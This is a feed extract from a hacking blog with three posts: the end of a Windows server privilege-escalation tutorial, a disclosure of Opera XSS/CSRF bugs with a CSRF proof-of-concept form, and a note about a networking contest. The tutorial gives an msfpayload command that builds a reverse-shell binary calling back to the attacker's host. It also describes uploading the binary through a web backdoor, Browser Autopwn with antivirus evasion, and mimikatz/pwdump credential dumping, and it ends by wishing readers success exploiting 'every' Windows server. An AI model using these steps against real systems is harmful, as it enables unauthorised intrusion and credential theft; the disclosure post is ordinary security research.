&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-GgtN_sahD3E/UXqcPc3mIzI/AAAAAAAAAW8/AasMUAEiBuY/s1600/query.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="111" src="http://3.bp.blogspot.com/-GgtN_sahD3E/UXqcPc3mIzI/AAAAAAAAAW8/AasMUAEiBuY/s400/query.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: center;"&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;
&lt;!--[if gte vml 1]&gt;&lt;v:shape id="Picture_x0020_3"
 o:spid="_x0000_i1029" type="#_x0000_t75" style='width:468pt;height:131.25pt;
 visibility:visible;mso-wrap-style:square'&gt;
 &lt;v:imagedata src="file:///C:\Users\r00t3r\AppData\Local\Temp\msohtmlclip1\01\clip_image005.png"
  o:title=""/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
This shows that I am currently NT Authority/System, which
most of us know is the highest user in the windows user hierarchy.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Now we can go for some post exploitation like enabling RDP,
adding accounts and allowing them to access RDP.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b&gt;&lt;i&gt;Note:&lt;/i&gt;&lt;/b&gt; If the server does not have xp_cmdshell stored
procedure, you can install it yourself. There are many tutorials for that online.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;o:p&gt;&amp;nbsp;&lt;/o:p&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b&gt;2. Meterpreter
Payload-&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
This method is quite easy and comes useful when we cannot
read files of other users, but we can execute commands.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Using metasploit, generate a reverse shell payload binary.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
For example-&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;i&gt;msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130
LPORT=31337 X &amp;gt; /tmp/1.exe&lt;/i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Now we will upload this executable to the server using our web
backdoor.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Now it's time to execute the payload.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
If everything goes right, we will get a meterpreter session
over the target machine as shown below-&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
We can also use php, asp or other payloads.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-INLb6GnSNZA/UXqcPMiaPeI/AAAAAAAAAW4/AP8bYiT6B3g/s1600/meterpretershell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="223" src="http://3.bp.blogspot.com/-INLb6GnSNZA/UXqcPMiaPeI/AAAAAAAAAW4/AP8bYiT6B3g/s400/meterpretershell.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b&gt;3. Browser Autopwn-&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
This seems odd, as a way of hacking a server. But I myself
found this as a clever way to do the job, especially in scenarios where we are
allowed to execute commands, but we cannot run executables (our payloads) due
to software restriction policies in domain environment.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Most of the windows servers have outdated Internet Explorer
and we can exploit them if we can execute commands.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
I think it is clear by now that what I'm trying to explain
;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
We can start Internet Explorer from command line and make it
browse to a specific URL.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Syntax for&amp;nbsp; this-&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;i&gt;iexplore.exe [URL]&lt;/i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Where URL would our server address which would be running
browser_autopwn. After that we can use railgun to avoid antivirus detection.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-soL_paoCfiU/UXqcMxkEr0I/AAAAAAAAAWU/CMKtk3CR88U/s1600/autopwn.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="145" src="http://3.bp.blogspot.com/-soL_paoCfiU/UXqcMxkEr0I/AAAAAAAAAWU/CMKtk3CR88U/s400/autopwn.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: center;"&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b&gt;4. Using readily
available tools-&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Tools like pwdump and mimikatz can crack passwords of
windows users.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
#pwdump7 gives out the NTLM hashes of the users which can be
cracked further using John the Ripper.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
The following screenshot shows NTLM hashes from pwdump7:&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-IB3vfdJsnYU/UXqcPHJkgBI/AAAAAAAAAW0/rAZr1EywAdM/s1600/pwdump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="135" src="http://4.bp.blogspot.com/-IB3vfdJsnYU/UXqcPHJkgBI/AAAAAAAAAW0/rAZr1EywAdM/s400/pwdump.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
#mimikatz is another great tool which extracts the plain text
passwords of users from lsass.exe. The tool is some language other than English
so do watch tutorials on how to use it.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Following picture shows plain text passwords from mimikatz:&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-uZowchEk4cU/UXqcN48DaKI/AAAAAAAAAWg/Y7rIx3iZjWI/s1600/mimikatz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="175" src="http://3.bp.blogspot.com/-uZowchEk4cU/UXqcN48DaKI/AAAAAAAAAWg/Y7rIx3iZjWI/s400/mimikatz.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
You can google about them and learn how to use these tools
and what actually they exploit to get the job done for you.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
I hope you can now exploit every another windows server.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Happy Hacking :)&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;About The Author&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
This article has been written by&amp;nbsp;&lt;b&gt;Deepankar Arora, &lt;/b&gt;He is an independent security researcher from India, He has been listed in various hall of fames.&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=LUI_mO7nnwc:LmPZTXoGfO4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=LUI_mO7nnwc:LmPZTXoGfO4:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=LUI_mO7nnwc:LmPZTXoGfO4:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=LUI_mO7nnwc:LmPZTXoGfO4:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=LUI_mO7nnwc:LmPZTXoGfO4:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=LUI_mO7nnwc:LmPZTXoGfO4:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=LUI_mO7nnwc:LmPZTXoGfO4:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=LUI_mO7nnwc:LmPZTXoGfO4:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=LUI_mO7nnwc:LmPZTXoGfO4:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=LUI_mO7nnwc:LmPZTXoGfO4:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=LUI_mO7nnwc:LmPZTXoGfO4:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/LUI_mO7nnwc" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/4456024198548604877/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/04/hacking-windows-servers-privilege.html#comment-form" title="5 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4456024198548604877?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4456024198548604877?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/LUI_mO7nnwc/hacking-windows-servers-privilege.html" title="Hacking Windows Servers - Privilege Escalation " /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-UrLtyYiYn_E/UXqi36trRRI/AAAAAAAACx8/PvMIguKthio/s72-c/hacking+windows+using+linux.jpg" height="72" width="72" /><thr:total>5</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/04/hacking-windows-servers-privilege.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0MHRn0yeyp7ImA9WhBVEk4.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-3340937732501461264</id><published>2013-04-17T10:20:00.000-07:00</published><updated>2013-04-17T13:43:57.393-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-17T13:43:57.393-07:00</app:edited><title>Stored XSS, CSRF And Clickjacking Vulnerabilities in Opera</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-5Oc03wF13Y8/UW7PVB_66SI/AAAAAAAACxM/uTQdh943OlI/s1600/Opera.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-5Oc03wF13Y8/UW7PVB_66SI/AAAAAAAACxM/uTQdh943OlI/s320/Opera.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Now a days, I am not much active in bug bounty programs, However, still i wanted to share my experience with Opera, Opera does not have a bug bounty program, However they certainly have their own way of thanking researchers by sending them some swag and listing their name under Hall of fame.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
I reported few&amp;nbsp;vulnerabilities&amp;nbsp;to opera including a Stored XSS, CSRF and a clickjacking vulnerability. The POC's for the&amp;nbsp;vulnerabilities&amp;nbsp;are as follows:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Stored XSS&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-7g-hcSKIiaY/UW6PNf-AFLI/AAAAAAAACw8/_0coWzDcnAc/s1600/OPERA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="280" src="http://3.bp.blogspot.com/-7g-hcSKIiaY/UW6PNf-AFLI/AAAAAAAACw8/_0coWzDcnAc/s640/OPERA.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
The &lt;b&gt;"Username"&lt;/b&gt; input was not being sanitized properly, Which resulted in an execution of javascript.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;CSRF POC&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
The form was missing with CSRF tokens, An attacker could have used a CSRF attack in order to manipulate the form details.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;POC&lt;/b&gt;&lt;br /&gt;
&lt;div style="font-weight: bold;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;i&gt;&amp;lt;html&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp;&amp;nbsp;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;lt;body&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;lt;form action="https://apps.opera.com/en_pk/account.php?action=details" method="POST"&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="email" value="rafaybaloch&amp;amp;#64;gmail&amp;amp;#46;com" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="name" value="Rafay&amp;amp;#32;Baloch" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="address1" value="f&amp;amp;#45;10&amp;amp;#44;afasf&amp;amp;#32;afs&amp;amp;#32;asf&amp;amp;#32;1&amp;amp;#44;block&amp;amp;#32;15&amp;amp;#32;near&amp;amp;#32;income&amp;amp;#32;tax&amp;amp;#32;office&amp;amp;#44;asssssss&amp;amp;#45;e&amp;amp;#45;johar" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="address2" value="" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="city" value="Karachi" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="state" value="" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="country" value="PK" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="zip" value="44000" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="phone" value="&amp;amp;#43;923333333333" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="submit" value="Submit form" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;lt;/form&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;lt;/body&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;lt;/html&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Opera Hall Of Fame&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
So, For my findings, Opera listed my name under their hall of fame:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-TGxhHPyg9g8/UW7_-y6YWXI/AAAAAAAACxk/hOusp8PbVeU/s1600/164685_10151461794588001_940281350_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="416" src="http://3.bp.blogspot.com/-TGxhHPyg9g8/UW7_-y6YWXI/AAAAAAAACxk/hOusp8PbVeU/s640/164685_10151461794588001_940281350_n.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Gift from Opera&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
As a token of appreciation, they also send me the following gifts:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-uvIcr5KbBTU/UW8BhLyK2-I/AAAAAAAACxs/FypZ0mya90Q/s1600/WP_20130417_002.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://1.bp.blogspot.com/-uvIcr5KbBTU/UW8BhLyK2-I/AAAAAAAACxs/FypZ0mya90Q/s640/WP_20130417_002.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
Opera is still sending some good stuff, I would recommend researchers to start looking opera's subdomains for low hanging fruits such as XSS, I know there is a lot of vulnerabilities out there unfixed.&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AmArpxY2Jfk:hqcyIUS1wEs:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AmArpxY2Jfk:hqcyIUS1wEs:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AmArpxY2Jfk:hqcyIUS1wEs:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=AmArpxY2Jfk:hqcyIUS1wEs:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AmArpxY2Jfk:hqcyIUS1wEs:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=AmArpxY2Jfk:hqcyIUS1wEs:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AmArpxY2Jfk:hqcyIUS1wEs:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AmArpxY2Jfk:hqcyIUS1wEs:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=AmArpxY2Jfk:hqcyIUS1wEs:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AmArpxY2Jfk:hqcyIUS1wEs:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=AmArpxY2Jfk:hqcyIUS1wEs:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/AmArpxY2Jfk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/3340937732501461264/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/04/stored-xss-csrf-and-clickjacking.html#comment-form" title="4 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3340937732501461264?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3340937732501461264?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/AmArpxY2Jfk/stored-xss-csrf-and-clickjacking.html" title="Stored XSS, CSRF And Clickjacking Vulnerabilities in Opera" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-5Oc03wF13Y8/UW7PVB_66SI/AAAAAAAACxM/uTQdh943OlI/s72-c/Opera.jpg" height="72" width="72" /><thr:total>4</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/04/stored-xss-csrf-and-clickjacking.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0IEQH8yfCp7ImA9WhBVEEg.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-9086851159865661986</id><published>2013-04-15T13:57:00.001-07:00</published><updated>2013-04-15T13:58:21.194-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-15T13:58:21.194-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Others" /><title>Won Network Designing Competition At PROCOM 2013</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-bk1Bcvbe8Xo/UWxnHuGeP8I/AAAAAAAACwk/Ve0uP17Irf8/s1600/544372_206051142873964_1748635807_n-620x315.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="203" src="http://1.bp.blogspot.com/-bk1Bcvbe8Xo/UWxnHuGeP8I/AAAAAAAACwk/Ve0uP17Irf8/s400/544372_206051142873964_1748635807_n-620x315.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
I am sorry friends as i haven't been able to post as i was really busy with some pentesting projects and my research. Now a days doing more learning part than teaching part. When i came in to hacking scene 6 years before, I started with Network security, but later every thing shifted to layer 7 i.e. web. So i started researching web application security. However, a since network and web work together, we cannot&amp;nbsp;completely&amp;nbsp;deny the network security part.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;Recently,We participated in "&lt;b&gt;PROCOM 2013&lt;/b&gt;" on behalf of &lt;b&gt;Bahria University karachi (Team name = White Tigers)&lt;/b&gt;&amp;nbsp;along with my two friends &lt;b&gt;"Mudassir"&lt;/b&gt; and &lt;b&gt;"Zia khan"&lt;/b&gt; and by the grace of Almighty Allah we managed to win the competition. Procom is the largest educational event that takes place every year in Fast University, it hosts more than 40 competition including speed programming, network designing, painting etc etc.&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-kFu1tzQgDFk/UWxpWioNxsI/AAAAAAAACws/HjsH_yUpR8w/s1600/305969_245864762225935_2124462853_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="175" src="http://3.bp.blogspot.com/-kFu1tzQgDFk/UWxpWioNxsI/AAAAAAAACws/HjsH_yUpR8w/s400/305969_245864762225935_2124462853_n.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
The competition was based on 5 rounds, which would test both&amp;nbsp;theoretical&amp;nbsp;and practical knowledge of the students. The major advantage was that lots of questions came from network security, which b.w i have been studying for few years. The things i learned from my CCNP route course also came into play and helped me a lot. My friend mudassir did really well too, he is dong his CCIE and is very sound in networking stuff.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;What's Next?&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
Well, I would continue my research with Network and web application security, I am also writing a book on &lt;b&gt;"Advanced Ethical Hacking"&lt;/b&gt;, which b/w i am hoping to finish it this year.&amp;nbsp;However apart from that, i would also move to programming side and participate in &lt;b&gt;"Speed Programming Contest"&lt;/b&gt;&amp;nbsp;and atleast winning it once.&lt;br /&gt;
&lt;br /&gt;
I would love to hear from you the&amp;nbsp;suggestions on improving at speed programming, either leave a comment or mail me directly at &lt;b&gt;rafayhackingarticles@gmail.com&lt;/b&gt;.&amp;nbsp;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
